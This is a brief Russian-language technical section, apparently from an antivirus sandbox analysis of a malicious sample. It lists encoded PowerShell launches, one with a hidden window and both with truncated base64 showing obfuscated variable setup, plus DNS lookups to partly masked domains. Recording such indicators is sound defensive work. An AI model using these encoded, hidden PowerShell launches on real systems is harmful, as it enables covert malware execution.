Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABRAGUAcABpAG8AZgBtAGYAZgBkAD0AJwBDAGQAcgBuAHIAYQBpAHIAegBsAHMAeQAnADsAJABFAG8AdgBlAGsAaABnAHcAcgAgAD0AIAAnADkAMAA5ACcAOwAkAFcAZQBrAHcAbQBpAHIAdQBoAGEAegA9ACcATgBiAHUAZQBkAHUAdABiAHQAJwA...
- DNS ASK ju###-dairy.com
- DNS ASK ya###otovn.com
- DNS ASK hu#####olarinverter.com
- DNS ASK ce######essierirabassi.com
- DNS ASK ta####techeap.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABRAGUAcABpAG8AZgBtAGYAZgBkAD0AJwBDAGQAcgBuAHIAYQBpAHIAegBsAHMAeQAnADsAJABFAG8AdgBlAGsAaABnAHcAcgAgAD0AIAAnADkAMAA5ACcAOwAkAFcAZQBrAHcAbQBpAHIAdQBoAGEAegA9ACcATgBiAHUAZQBkAHUAdABiAHQAJwA...' (со скрытым окном)